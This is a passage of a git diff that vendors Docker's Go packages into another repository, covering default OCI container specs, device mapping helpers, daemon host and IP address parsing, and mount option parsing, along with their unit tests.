+			"/proc/timer_stats",
+			"/proc/sched_debug",
+			"/sys/firmware",
+		},
+		ReadonlyPaths: []string{
+			"/proc/asound",
+			"/proc/bus",
+			"/proc/fs",
+			"/proc/irq",
+			"/proc/sys",
+			"/proc/sysrq-trigger",
+		},
+		Namespaces: []specs.Namespace{
+			{Type: "mount"},
+			{Type: "network"},
+			{Type: "uts"},
+			{Type: "pid"},
+			{Type: "ipc"},
+		},
+		// Devices implicitly contains the following devices:
+		// null, zero, full, random, urandom, tty, console, and ptmx.
+		// ptmx is a bind-mount or symlink of the container's ptmx.
+		// See also: https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#default-devices
+		Devices: []specs.Device{},
+		Resources: &specs.Resources{
+			Devices: []specs.DeviceCgroup{
+				{
+					Allow:  false,
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  true,
+					Type:   sPtr("c"),
+					Major:  iPtr(1),
+					Minor:  iPtr(5),
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  true,
+					Type:   sPtr("c"),
+					Major:  iPtr(1),
+					Minor:  iPtr(3),
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  true,
+					Type:   sPtr("c"),
+					Major:  iPtr(1),
+					Minor:  iPtr(9),
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  true,
+					Type:   sPtr("c"),
+					Major:  iPtr(1),
+					Minor:  iPtr(8),
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  true,
+					Type:   sPtr("c"),
+					Major:  iPtr(5),
+					Minor:  iPtr(0),
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  true,
+					Type:   sPtr("c"),
+					Major:  iPtr(5),
+					Minor:  iPtr(1),
+					Access: sPtr("rwm"),
+				},
+				{
+					Allow:  false,
+					Type:   sPtr("c"),
+					Major:  iPtr(10),
+					Minor:  iPtr(229),
+					Access: sPtr("rwm"),
+				},
+			},
+		},
+	}
+
+	return s
+}
diff --git a/vendor/github.com/docker/docker/oci/defaults_solaris.go b/vendor/github.com/docker/docker/oci/defaults_solaris.go
new file mode 100644
index 0000000000..85c8b68e16
--- /dev/null
+++ b/vendor/github.com/docker/docker/oci/defaults_solaris.go
@@ -0,0 +1,20 @@
+package oci
+
+import (
+	"runtime"
+
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// DefaultSpec returns default oci spec used by docker.
+func DefaultSpec() specs.Spec {
+	s := specs.Spec{
+		Version: "0.6.0",
+		Platform: specs.Platform{
+			OS:   "SunOS",
+			Arch: runtime.GOARCH,
+		},
+	}
+	s.Solaris = &specs.Solaris{}
+	return s
+}
diff --git a/vendor/github.com/docker/docker/oci/defaults_windows.go b/vendor/github.com/docker/docker/oci/defaults_windows.go
new file mode 100644
index 0000000000..ab51904ec4
--- /dev/null
+++ b/vendor/github.com/docker/docker/oci/defaults_windows.go
@@ -0,0 +1,19 @@
+package oci
+
+import (
+	"runtime"
+
+	"github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// DefaultSpec returns default spec used by docker.
+func DefaultSpec() specs.Spec {
+	return specs.Spec{
+		Version: specs.Version,
+		Platform: specs.Platform{
+			OS:   runtime.GOOS,
+			Arch: runtime.GOARCH,
+		},
+		Windows: &specs.Windows{},
+	}
+}
diff --git a/vendor/github.com/docker/docker/oci/devices_linux.go b/vendor/github.com/docker/docker/oci/devices_linux.go
new file mode 100644
index 0000000000..2840d2586a
--- /dev/null
+++ b/vendor/github.com/docker/docker/oci/devices_linux.go
@@ -0,0 +1,86 @@
+package oci
+
+import (
+	"fmt"
+	"os"
+	"path/filepath"
+	"strings"
+
+	"github.com/opencontainers/runc/libcontainer/configs"
+	"github.com/opencontainers/runc/libcontainer/devices"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// Device transforms a libcontainer configs.Device to a specs.Device object.
+func Device(d *configs.Device) specs.Device {
+	return specs.Device{
+		Type:     string(d.Type),
+		Path:     d.Path,
+		Major:    d.Major,
+		Minor:    d.Minor,
+		FileMode: fmPtr(int64(d.FileMode)),
+		UID:      u32Ptr(int64(d.Uid)),
+		GID:      u32Ptr(int64(d.Gid)),
+	}
+}
+
+func deviceCgroup(d *configs.Device) specs.DeviceCgroup {
+	t := string(d.Type)
+	return specs.DeviceCgroup{
+		Allow:  true,
+		Type:   &t,
+		Major:  &d.Major,
+		Minor:  &d.Minor,
+		Access: &d.Permissions,
+	}
+}
+
+// DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions.
+func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) {
+	resolvedPathOnHost := pathOnHost
+
+	// check if it is a symbolic link
+	if src, e := os.Lstat(pathOnHost); e == nil && src.Mode()&os.ModeSymlink == os.ModeSymlink {
+		if linkedPathOnHost, e := filepath.EvalSymlinks(pathOnHost); e == nil {
+			resolvedPathOnHost = linkedPathOnHost
+		}
+	}
+
+	device, err := devices.DeviceFromPath(resolvedPathOnHost, cgroupPermissions)
+	// if there was no error, return the device
+	if err == nil {
+		device.Path = pathInContainer
+		return append(devs, Device(device)), append(devPermissions, deviceCgroup(device)), nil
+	}
+
+	// if the device is not a device node
+	// try to see if it's a directory holding many devices
+	if err == devices.ErrNotADevice {
+
+		// check if it is a directory
+		if src, e := os.Stat(resolvedPathOnHost); e == nil && src.IsDir() {
+
+			// mount the internal devices recursively
+			filepath.Walk(resolvedPathOnHost, func(dpath string, f os.FileInfo, e error) error {
+				childDevice, e := devices.DeviceFromPath(dpath, cgroupPermissions)
+				if e != nil {
+					// ignore the device
+					return nil
+				}
+
+				// add the device to userSpecified devices
+				childDevice.Path = strings.Replace(dpath, resolvedPathOnHost, pathInContainer, 1)
+				devs = append(devs, Device(childDevice))
+				devPermissions = append(devPermissions, deviceCgroup(childDevice))
+
+				return nil
+			})
+		}
+	}
+
+	if len(devs) > 0 {
+		return devs, devPermissions, nil
+	}
+
+	return devs, devPermissions, fmt.Errorf("error gathering device information while adding custom device %q: %s", pathOnHost, err)
+}
diff --git a/vendor/github.com/docker/docker/oci/devices_unsupported.go b/vendor/github.com/docker/docker/oci/devices_unsupported.go
new file mode 100644
index 0000000000..6252cab536
--- /dev/null
+++ b/vendor/github.com/docker/docker/oci/devices_unsupported.go
@@ -0,0 +1,20 @@
+// +build !linux
+
+package oci
+
+import (
+	"errors"
+
+	"github.com/opencontainers/runc/libcontainer/configs"
+	specs "github.com/opencontainers/runtime-spec/specs-go"
+)
+
+// Device transforms a libcontainer configs.Device to a specs.Device object.
+// Not implemented
+func Device(d *configs.Device) specs.Device { return specs.Device{} }
+
+// DevicesFromPath computes a list of devices and device permissions from paths (pathOnHost and pathInContainer) and cgroup permissions.
+// Not implemented
+func DevicesFromPath(pathOnHost, pathInContainer, cgroupPermissions string) (devs []specs.Device, devPermissions []specs.DeviceCgroup, err error) {
+	return nil, nil, errors.New("oci/devices: unsupported platform")
+}
diff --git a/vendor/github.com/docker/docker/oci/namespaces.go b/vendor/github.com/docker/docker/oci/namespaces.go
new file mode 100644
index 0000000000..4902482498
--- /dev/null
+++ b/vendor/github.com/docker/docker/oci/namespaces.go
@@ -0,0 +1,16 @@
+package oci
+
+import specs "github.com/opencontainers/runtime-spec/specs-go"
+
+// RemoveNamespace removes the `nsType` namespace from OCI spec `s`
+func RemoveNamespace(s *specs.Spec, nsType specs.NamespaceType) {
+	idx := -1
+	for i, n := range s.Linux.Namespaces {
+		if n.Type == nsType {
+			idx = i
+		}
+	}
+	if idx >= 0 {
+		s.Linux.Namespaces = append(s.Linux.Namespaces[:idx], s.Linux.Namespaces[idx+1:]...)
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/hosts.go b/vendor/github.com/docker/docker/opts/hosts.go
new file mode 100644
index 0000000000..266df1e537
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/hosts.go
@@ -0,0 +1,151 @@
+package opts
+
+import (
+	"fmt"
+	"net"
+	"net/url"
+	"strconv"
+	"strings"
+)
+
+var (
+	// DefaultHTTPPort Default HTTP Port used if only the protocol is provided to -H flag e.g. docker daemon -H tcp://
+	// These are the IANA registered port numbers for use with Docker
+	// see http://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml?search=docker
+	DefaultHTTPPort = 2375 // Default HTTP Port
+	// DefaultTLSHTTPPort Default HTTP Port used when TLS enabled
+	DefaultTLSHTTPPort = 2376 // Default TLS encrypted HTTP Port
+	// DefaultUnixSocket Path for the unix socket.
+	// Docker daemon by default always listens on the default unix socket
+	DefaultUnixSocket = "/var/run/docker.sock"
+	// DefaultTCPHost constant defines the default host string used by docker on Windows
+	DefaultTCPHost = fmt.Sprintf("tcp://%s:%d", DefaultHTTPHost, DefaultHTTPPort)
+	// DefaultTLSHost constant defines the default host string used by docker for TLS sockets
+	DefaultTLSHost = fmt.Sprintf("tcp://%s:%d", DefaultHTTPHost, DefaultTLSHTTPPort)
+	// DefaultNamedPipe defines the default named pipe used by docker on Windows
+	DefaultNamedPipe = `//./pipe/docker_engine`
+)
+
+// ValidateHost validates that the specified string is a valid host and returns it.
+func ValidateHost(val string) (string, error) {
+	host := strings.TrimSpace(val)
+	// The empty string means default and is not handled by parseDockerDaemonHost
+	if host != "" {
+		_, err := parseDockerDaemonHost(host)
+		if err != nil {
+			return val, err
+		}
+	}
+	// Note: unlike most flag validators, we don't return the mutated value here
+	//       we need to know what the user entered later (using ParseHost) to adjust for tls
+	return val, nil
+}
+
+// ParseHost and set defaults for a Daemon host string
+func ParseHost(defaultToTLS bool, val string) (string, error) {
+	host := strings.TrimSpace(val)
+	if host == "" {
+		if defaultToTLS {
+			host = DefaultTLSHost
+		} else {
+			host = DefaultHost
+		}
+	} else {
+		var err error
+		host, err = parseDockerDaemonHost(host)
+		if err != nil {
+			return val, err
+		}
+	}
+	return host, nil
+}
+
+// parseDockerDaemonHost parses the specified address and returns an address that will be used as the host.
+// Depending of the address specified, this may return one of the global Default* strings defined in hosts.go.
+func parseDockerDaemonHost(addr string) (string, error) {
+	addrParts := strings.SplitN(addr, "://", 2)
+	if len(addrParts) == 1 && addrParts[0] != "" {
+		addrParts = []string{"tcp", addrParts[0]}
+	}
+
+	switch addrParts[0] {
+	case "tcp":
+		return ParseTCPAddr(addrParts[1], DefaultTCPHost)
+	case "unix":
+		return parseSimpleProtoAddr("unix", addrParts[1], DefaultUnixSocket)
+	case "npipe":
+		return parseSimpleProtoAddr("npipe", addrParts[1], DefaultNamedPipe)
+	case "fd":
+		return addr, nil
+	default:
+		return "", fmt.Errorf("Invalid bind address format: %s", addr)
+	}
+}
+
+// parseSimpleProtoAddr parses and validates that the specified address is a valid
+// socket address for simple protocols like unix and npipe. It returns a formatted
+// socket address, either using the address parsed from addr, or the contents of
+// defaultAddr if addr is a blank string.
+func parseSimpleProtoAddr(proto, addr, defaultAddr string) (string, error) {
+	addr = strings.TrimPrefix(addr, proto+"://")
+	if strings.Contains(addr, "://") {
+		return "", fmt.Errorf("Invalid proto, expected %s: %s", proto, addr)
+	}
+	if addr == "" {
+		addr = defaultAddr
+	}
+	return fmt.Sprintf("%s://%s", proto, addr), nil
+}
+
+// ParseTCPAddr parses and validates that the specified address is a valid TCP
+// address. It returns a formatted TCP address, either using the address parsed
+// from tryAddr, or the contents of defaultAddr if tryAddr is a blank string.
+// tryAddr is expected to have already been Trim()'d
+// defaultAddr must be in the full `tcp://host:port` form
+func ParseTCPAddr(tryAddr string, defaultAddr string) (string, error) {
+	if tryAddr == "" || tryAddr == "tcp://" {
+		return defaultAddr, nil
+	}
+	addr := strings.TrimPrefix(tryAddr, "tcp://")
+	if strings.Contains(addr, "://") || addr == "" {
+		return "", fmt.Errorf("Invalid proto, expected tcp: %s", tryAddr)
+	}
+
+	defaultAddr = strings.TrimPrefix(defaultAddr, "tcp://")
+	defaultHost, defaultPort, err := net.SplitHostPort(defaultAddr)
+	if err != nil {
+		return "", err
+	}
+	// url.Parse fails for trailing colon on IPv6 brackets on Go 1.5, but
+	// not 1.4. See https://github.com/golang/go/issues/12200 and
+	// https://github.com/golang/go/issues/6530.
+	if strings.HasSuffix(addr, "]:") {
+		addr += defaultPort
+	}
+
+	u, err := url.Parse("tcp://" + addr)
+	if err != nil {
+		return "", err
+	}
+	host, port, err := net.SplitHostPort(u.Host)
+	if err != nil {
+		// try port addition once
+		host, port, err = net.SplitHostPort(net.JoinHostPort(u.Host, defaultPort))
+	}
+	if err != nil {
+		return "", fmt.Errorf("Invalid bind address format: %s", tryAddr)
+	}
+
+	if host == "" {
+		host = defaultHost
+	}
+	if port == "" {
+		port = defaultPort
+	}
+	p, err := strconv.Atoi(port)
+	if err != nil && p == 0 {
+		return "", fmt.Errorf("Invalid bind address format: %s", tryAddr)
+	}
+
+	return fmt.Sprintf("tcp://%s%s", net.JoinHostPort(host, port), u.Path), nil
+}
diff --git a/vendor/github.com/docker/docker/opts/hosts_test.go b/vendor/github.com/docker/docker/opts/hosts_test.go
new file mode 100644
index 0000000000..a5bec30d4c
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/hosts_test.go
@@ -0,0 +1,148 @@
+package opts
+
+import (
+	"fmt"
+	"testing"
+)
+
+func TestParseHost(t *testing.T) {
+	invalid := []string{
+		"something with spaces",
+		"://",
+		"unknown://",
+		"tcp://:port",
+		"tcp://invalid:port",
+	}
+
+	valid := map[string]string{
+		"":                         DefaultHost,
+		" ":                        DefaultHost,
+		"  ":                       DefaultHost,
+		"fd://":                    "fd://",
+		"fd://something":           "fd://something",
+		"tcp://host:":              fmt.Sprintf("tcp://host:%d", DefaultHTTPPort),
+		"tcp://":                   DefaultTCPHost,
+		"tcp://:2375":              fmt.Sprintf("tcp://%s:2375", DefaultHTTPHost),
+		"tcp://:2376":              fmt.Sprintf("tcp://%s:2376", DefaultHTTPHost),
+		"tcp://0.0.0.0:8080":       "tcp://0.0.0.0:8080",
+		"tcp://192.168.0.0:12000":  "tcp://192.168.0.0:12000",
+		"tcp://192.168:8080":       "tcp://192.168:8080",
+		"tcp://0.0.0.0:1234567890": "tcp://0.0.0.0:1234567890", // yeah it's valid :P
+		" tcp://:7777/path ":       fmt.Sprintf("tcp://%s:7777/path", DefaultHTTPHost),
+		"tcp://docker.com:2375":    "tcp://docker.com:2375",
+		"unix://":                  "unix://" + DefaultUnixSocket,
+		"unix://path/to/socket":    "unix://path/to/socket",
+		"npipe://":                 "npipe://" + DefaultNamedPipe,
+		"npipe:////./pipe/foo":     "npipe:////./pipe/foo",
+	}
+
+	for _, value := range invalid {
+		if _, err := ParseHost(false, value); err == nil {
+			t.Errorf("Expected an error for %v, got [nil]", value)
+		}
+	}
+
+	for value, expected := range valid {
+		if actual, err := ParseHost(false, value); err != nil || actual != expected {
+			t.Errorf("Expected for %v [%v], got [%v, %v]", value, expected, actual, err)
+		}
+	}
+}
+
+func TestParseDockerDaemonHost(t *testing.T) {
+	invalids := map[string]string{
+
+		"tcp:a.b.c.d":                   "Invalid bind address format: tcp:a.b.c.d",
+		"tcp:a.b.c.d/path":              "Invalid bind address format: tcp:a.b.c.d/path",
+		"udp://127.0.0.1":               "Invalid bind address format: udp://127.0.0.1",
+		"udp://127.0.0.1:2375":          "Invalid bind address format: udp://127.0.0.1:2375",
+		"tcp://unix:///run/docker.sock": "Invalid proto, expected tcp: unix:///run/docker.sock",
+		" tcp://:7777/path ":            "Invalid bind address format:  tcp://:7777/path ",
+		"":                              "Invalid bind address format: ",
+	}
+	valids := map[string]string{
+		"0.0.0.1:":                    "tcp://0.0.0.1:2375",
+		"0.0.0.1:5555":                "tcp://0.0.0.1:5555",
+		"0.0.0.1:5555/path":           "tcp://0.0.0.1:5555/path",
+		"[::1]:":                      "tcp://[::1]:2375",
+		"[::1]:5555/path":             "tcp://[::1]:5555/path",
+		"[0:0:0:0:0:0:0:1]:":          "tcp://[0:0:0:0:0:0:0:1]:2375",
+		"[0:0:0:0:0:0:0:1]:5555/path": "tcp://[0:0:0:0:0:0:0:1]:5555/path",
+		":6666":                   fmt.Sprintf("tcp://%s:6666", DefaultHTTPHost),
+		":6666/path":              fmt.Sprintf("tcp://%s:6666/path", DefaultHTTPHost),
+		"tcp://":                  DefaultTCPHost,
+		"tcp://:7777":             fmt.Sprintf("tcp://%s:7777", DefaultHTTPHost),
+		"tcp://:7777/path":        fmt.Sprintf("tcp://%s:7777/path", DefaultHTTPHost),
+		"unix:///run/docker.sock": "unix:///run/docker.sock",
+		"unix://":                 "unix://" + DefaultUnixSocket,
+		"fd://":                   "fd://",
+		"fd://something":          "fd://something",
+		"localhost:":              "tcp://localhost:2375",
+		"localhost:5555":          "tcp://localhost:5555",
+		"localhost:5555/path":     "tcp://localhost:5555/path",
+	}
+	for invalidAddr, expectedError := range invalids {
+		if addr, err := parseDockerDaemonHost(invalidAddr); err == nil || err.Error() != expectedError {
+			t.Errorf("tcp %v address expected error %q return, got %q and addr %v", invalidAddr, expectedError, err, addr)
+		}
+	}
+	for validAddr, expectedAddr := range valids {
+		if addr, err := parseDockerDaemonHost(validAddr); err != nil || addr != expectedAddr {
+			t.Errorf("%v -> expected %v, got (%v) addr (%v)", validAddr, expectedAddr, err, addr)
+		}
+	}
+}
+
+func TestParseTCP(t *testing.T) {
+	var (
+		defaultHTTPHost = "tcp://127.0.0.1:2376"
+	)
+	invalids := map[string]string{
+		"tcp:a.b.c.d":          "Invalid bind address format: tcp:a.b.c.d",
+		"tcp:a.b.c.d/path":     "Invalid bind address format: tcp:a.b.c.d/path",
+		"udp://127.0.0.1":      "Invalid proto, expected tcp: udp://127.0.0.1",
+		"udp://127.0.0.1:2375": "Invalid proto, expected tcp: udp://127.0.0.1:2375",
+	}
+	valids := map[string]string{
+		"":                            defaultHTTPHost,
+		"tcp://":                      defaultHTTPHost,
+		"0.0.0.1:":                    "tcp://0.0.0.1:2376",
+		"0.0.0.1:5555":                "tcp://0.0.0.1:5555",
+		"0.0.0.1:5555/path":           "tcp://0.0.0.1:5555/path",
+		":6666":                       "tcp://127.0.0.1:6666",
+		":6666/path":                  "tcp://127.0.0.1:6666/path",
+		"tcp://:7777":                 "tcp://127.0.0.1:7777",
+		"tcp://:7777/path":            "tcp://127.0.0.1:7777/path",
+		"[::1]:":                      "tcp://[::1]:2376",
+		"[::1]:5555":                  "tcp://[::1]:5555",
+		"[::1]:5555/path":             "tcp://[::1]:5555/path",
+		"[0:0:0:0:0:0:0:1]:":          "tcp://[0:0:0:0:0:0:0:1]:2376",
+		"[0:0:0:0:0:0:0:1]:5555":      "tcp://[0:0:0:0:0:0:0:1]:5555",
+		"[0:0:0:0:0:0:0:1]:5555/path": "tcp://[0:0:0:0:0:0:0:1]:5555/path",
+		"localhost:":                  "tcp://localhost:2376",
+		"localhost:5555":              "tcp://localhost:5555",
+		"localhost:5555/path":         "tcp://localhost:5555/path",
+	}
+	for invalidAddr, expectedError := range invalids {
+		if addr, err := ParseTCPAddr(invalidAddr, defaultHTTPHost); err == nil || err.Error() != expectedError {
+			t.Errorf("tcp %v address expected error %v return, got %s and addr %v", invalidAddr, expectedError, err, addr)
+		}
+	}
+	for validAddr, expectedAddr := range valids {
+		if addr, err := ParseTCPAddr(validAddr, defaultHTTPHost); err != nil || addr != expectedAddr {
+			t.Errorf("%v -> expected %v, got %v and addr %v", validAddr, expectedAddr, err, addr)
+		}
+	}
+}
+
+func TestParseInvalidUnixAddrInvalid(t *testing.T) {
+	if _, err := parseSimpleProtoAddr("unix", "tcp://127.0.0.1", "unix:///var/run/docker.sock"); err == nil || err.Error() != "Invalid proto, expected unix: tcp://127.0.0.1" {
+		t.Fatalf("Expected an error, got %v", err)
+	}
+	if _, err := parseSimpleProtoAddr("unix", "unix://tcp://127.0.0.1", "/var/run/docker.sock"); err == nil || err.Error() != "Invalid proto, expected unix: tcp://127.0.0.1" {
+		t.Fatalf("Expected an error, got %v", err)
+	}
+	if v, err := parseSimpleProtoAddr("unix", "", "/var/run/docker.sock"); err != nil || v != "unix:///var/run/docker.sock" {
+		t.Fatalf("Expected an %v, got %v", v, "unix:///var/run/docker.sock")
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/hosts_unix.go b/vendor/github.com/docker/docker/opts/hosts_unix.go
new file mode 100644
index 0000000000..611407a9d9
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/hosts_unix.go
@@ -0,0 +1,8 @@
+// +build !windows
+
+package opts
+
+import "fmt"
+
+// DefaultHost constant defines the default host string used by docker on other hosts than Windows
+var DefaultHost = fmt.Sprintf("unix://%s", DefaultUnixSocket)
diff --git a/vendor/github.com/docker/docker/opts/hosts_windows.go b/vendor/github.com/docker/docker/opts/hosts_windows.go
new file mode 100644
index 0000000000..7c239e00f1
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/hosts_windows.go
@@ -0,0 +1,6 @@
+// +build windows
+
+package opts
+
+// DefaultHost constant defines the default host string used by docker on Windows
+var DefaultHost = "npipe://" + DefaultNamedPipe
diff --git a/vendor/github.com/docker/docker/opts/ip.go b/vendor/github.com/docker/docker/opts/ip.go
new file mode 100644
index 0000000000..fb03b50111
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/ip.go
@@ -0,0 +1,47 @@
+package opts
+
+import (
+	"fmt"
+	"net"
+)
+
+// IPOpt holds an IP. It is used to store values from CLI flags.
+type IPOpt struct {
+	*net.IP
+}
+
+// NewIPOpt creates a new IPOpt from a reference net.IP and a
+// string representation of an IP. If the string is not a valid
+// IP it will fallback to the specified reference.
+func NewIPOpt(ref *net.IP, defaultVal string) *IPOpt {
+	o := &IPOpt{
+		IP: ref,
+	}
+	o.Set(defaultVal)
+	return o
+}
+
+// Set sets an IPv4 or IPv6 address from a given string. If the given
+// string is not parseable as an IP address it returns an error.
+func (o *IPOpt) Set(val string) error {
+	ip := net.ParseIP(val)
+	if ip == nil {
+		return fmt.Errorf("%s is not an ip address", val)
+	}
+	*o.IP = ip
+	return nil
+}
+
+// String returns the IP address stored in the IPOpt. If stored IP is a
+// nil pointer, it returns an empty string.
+func (o *IPOpt) String() string {
+	if *o.IP == nil {
+		return ""
+	}
+	return o.IP.String()
+}
+
+// Type returns the type of the option
+func (o *IPOpt) Type() string {
+	return "ip"
+}
diff --git a/vendor/github.com/docker/docker/opts/ip_test.go b/vendor/github.com/docker/docker/opts/ip_test.go
new file mode 100644
index 0000000000..1027d84a05
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/ip_test.go
@@ -0,0 +1,54 @@
+package opts
+
+import (
+	"net"
+	"testing"
+)
+
+func TestIpOptString(t *testing.T) {
+	addresses := []string{"", "0.0.0.0"}
+	var ip net.IP
+
+	for _, address := range addresses {
+		stringAddress := NewIPOpt(&ip, address).String()
+		if stringAddress != address {
+			t.Fatalf("IpOpt string should be `%s`, not `%s`", address, stringAddress)
+		}
+	}
+}
+
+func TestNewIpOptInvalidDefaultVal(t *testing.T) {
+	ip := net.IPv4(127, 0, 0, 1)
+	defaultVal := "Not an ip"
+
+	ipOpt := NewIPOpt(&ip, defaultVal)
+
+	expected := "127.0.0.1"
+	if ipOpt.String() != expected {
+		t.Fatalf("Expected [%v], got [%v]", expected, ipOpt.String())
+	}
+}
+
+func TestNewIpOptValidDefaultVal(t *testing.T) {
+	ip := net.IPv4(127, 0, 0, 1)
+	defaultVal := "192.168.1.1"
+
+	ipOpt := NewIPOpt(&ip, defaultVal)
+
+	expected := "192.168.1.1"
+	if ipOpt.String() != expected {
+		t.Fatalf("Expected [%v], got [%v]", expected, ipOpt.String())
+	}
+}
+
+func TestIpOptSetInvalidVal(t *testing.T) {
+	ip := net.IPv4(127, 0, 0, 1)
+	ipOpt := &IPOpt{IP: &ip}
+
+	invalidIP := "invalid ip"
+	expectedError := "invalid ip is not an ip address"
+	err := ipOpt.Set(invalidIP)
+	if err == nil || err.Error() != expectedError {
+		t.Fatalf("Expected an Error with [%v], got [%v]", expectedError, err.Error())
+	}
+}
diff --git a/vendor/github.com/docker/docker/opts/mount.go b/vendor/github.com/docker/docker/opts/mount.go
new file mode 100644
index 0000000000..ce6383ddca
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/mount.go
@@ -0,0 +1,171 @@
+package opts
+
+import (
+	"encoding/csv"
+	"fmt"
+	"os"
+	"strconv"
+	"strings"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/go-units"
+)
+
+// MountOpt is a Value type for parsing mounts
+type MountOpt struct {
+	values []mounttypes.Mount
+}
+
+// Set a new mount value
+func (m *MountOpt) Set(value string) error {
+	csvReader := csv.NewReader(strings.NewReader(value))
+	fields, err := csvReader.Read()
+	if err != nil {
+		return err
+	}
+
+	mount := mounttypes.Mount{}
+
+	volumeOptions := func() *mounttypes.VolumeOptions {
+		if mount.VolumeOptions == nil {
+			mount.VolumeOptions = &mounttypes.VolumeOptions{
+				Labels: make(map[string]string),
+			}
+		}
+		if mount.VolumeOptions.DriverConfig == nil {
+			mount.VolumeOptions.DriverConfig = &mounttypes.Driver{}
+		}
+		return mount.VolumeOptions
+	}
+
+	bindOptions := func() *mounttypes.BindOptions {
+		if mount.BindOptions == nil {
+			mount.BindOptions = new(mounttypes.BindOptions)
+		}
+		return mount.BindOptions
+	}
+
+	tmpfsOptions := func() *mounttypes.TmpfsOptions {
+		if mount.TmpfsOptions == nil {
+			mount.TmpfsOptions = new(mounttypes.TmpfsOptions)
+		}
+		return mount.TmpfsOptions
+	}
+
+	setValueOnMap := func(target map[string]string, value string) {
+		parts := strings.SplitN(value, "=", 2)
+		if len(parts) == 1 {
+			target[value] = ""
+		} else {
+			target[parts[0]] = parts[1]
+		}
+	}
+
+	mount.Type = mounttypes.TypeVolume // default to volume mounts
+	// Set writable as the default
+	for _, field := range fields {
+		parts := strings.SplitN(field, "=", 2)
+		key := strings.ToLower(parts[0])
+
+		if len(parts) == 1 {
+			switch key {
+			case "readonly", "ro":
+				mount.ReadOnly = true
+				continue
+			case "volume-nocopy":
+				volumeOptions().NoCopy = true
+				continue
+			}
+		}
+
+		if len(parts) != 2 {
+			return fmt.Errorf("invalid field '%s' must be a key=value pair", field)
+		}
+
+		value := parts[1]
+		switch key {
+		case "type":
+			mount.Type = mounttypes.Type(strings.ToLower(value))
+		case "source", "src":
+			mount.Source = value
+		case "target", "dst", "destination":
+			mount.Target = value
+		case "readonly", "ro":
+			mount.ReadOnly, err = strconv.ParseBool(value)
+			if err != nil {
+				return fmt.Errorf("invalid value for %s: %s", key, value)
+			}
+		case "bind-propagation":
+			bindOptions().Propagation = mounttypes.Propagation(strings.ToLower(value))
+		case "volume-nocopy":
+			volumeOptions().NoCopy, err = strconv.ParseBool(value)
+			if err != nil {
+				return fmt.Errorf("invalid value for populate: %s", value)
+			}
+		case "volume-label":
+			setValueOnMap(volumeOptions().Labels, value)
+		case "volume-driver":
+			volumeOptions().DriverConfig.Name = value
+		case "volume-opt":
+			if volumeOptions().DriverConfig.Options == nil {
+				volumeOptions().DriverConfig.Options = make(map[string]string)
+			}
+			setValueOnMap(volumeOptions().DriverConfig.Options, value)
+		case "tmpfs-size":
+			sizeBytes, err := units.RAMInBytes(value)
+			if err != nil {
+				return fmt.Errorf("invalid value for %s: %s", key, value)
+			}
+			tmpfsOptions().SizeBytes = sizeBytes
+		case "tmpfs-mode":
+			ui64, err := strconv.ParseUint(value, 8, 32)
+			if err != nil {
+				return fmt.Errorf("invalid value for %s: %s", key, value)
+			}
+			tmpfsOptions().Mode = os.FileMode(ui64)
+		default:
+			return fmt.Errorf("unexpected key '%s' in '%s'", key, field)
+		}
+	}
+
+	if mount.Type == "" {
+		return fmt.Errorf("type is required")
+	}
+
+	if mount.Target == "" {
+		return fmt.Errorf("target is required")
+	}
+
+	if mount.VolumeOptions != nil && mount.Type != mounttypes.TypeVolume {
+		return fmt.Errorf("cannot mix 'volume-*' options with mount type '%s'", mount.Type)
+	}
+	if mount.BindOptions != nil && mount.Type != mounttypes.TypeBind {
+		return fmt.Errorf("cannot mix 'bind-*' options with mount type '%s'", mount.Type)
+	}
+	if mount.TmpfsOptions != nil && mount.Type != mounttypes.TypeTmpfs {
+		return fmt.Errorf("cannot mix 'tmpfs-*' options with mount type '%s'", mount.Type)
+	}
+
+	m.values = append(m.values, mount)
+	return nil
+}
+
+// Type returns the type of this option
+func (m *MountOpt) Type() string {
+	return "mount"
+}
+
+// String returns a string repr of this option
+func (m *MountOpt) String() string {
+	mounts := []string{}
+	for _, mount := range m.values {
+		repr := fmt.Sprintf("%s %s %s", mount.Type, mount.Source, mount.Target)
+		mounts = append(mounts, repr)
+	}
+	return strings.Join(mounts, ", ")
+}
+
+// Value returns the mounts
+func (m *MountOpt) Value() []mounttypes.Mount {
+	return m.values
+}
diff --git a/vendor/github.com/docker/docker/opts/mount_test.go b/vendor/github.com/docker/docker/opts/mount_test.go
new file mode 100644
index 0000000000..59606c38e2
--- /dev/null
+++ b/vendor/github.com/docker/docker/opts/mount_test.go
@@ -0,0 +1,184 @@
+package opts
+
+import (
+	"os"
+	"testing"
+
+	mounttypes "github.com/docker/docker/api/types/mount"
+	"github.com/docker/docker/pkg/testutil/assert"
+)
+
+func TestMountOptString(t *testing.T) {
+	mount := MountOpt{
+		values: []mounttypes.Mount{
+			{
+				Type:   mounttypes.TypeBind,
+				Source: "/home/path",
+				Target: "/target",
+			},
+			{
+				Type:   mounttypes.TypeVolume,
+				Source: "foo",
+				Target: "/target/foo",
+			},
+		},
+	}
+	expected := "bind /home/path /target, volume foo /target/foo"
+	assert.Equal(t, mount.String(), expected)
+}
+
+func TestMountOptSetBindNoErrorBind(t *testing.T) {
+	for _, testcase := range []string{
+		// tests several aliases that should have same result.
+		"type=bind,target=/target,source=/source",
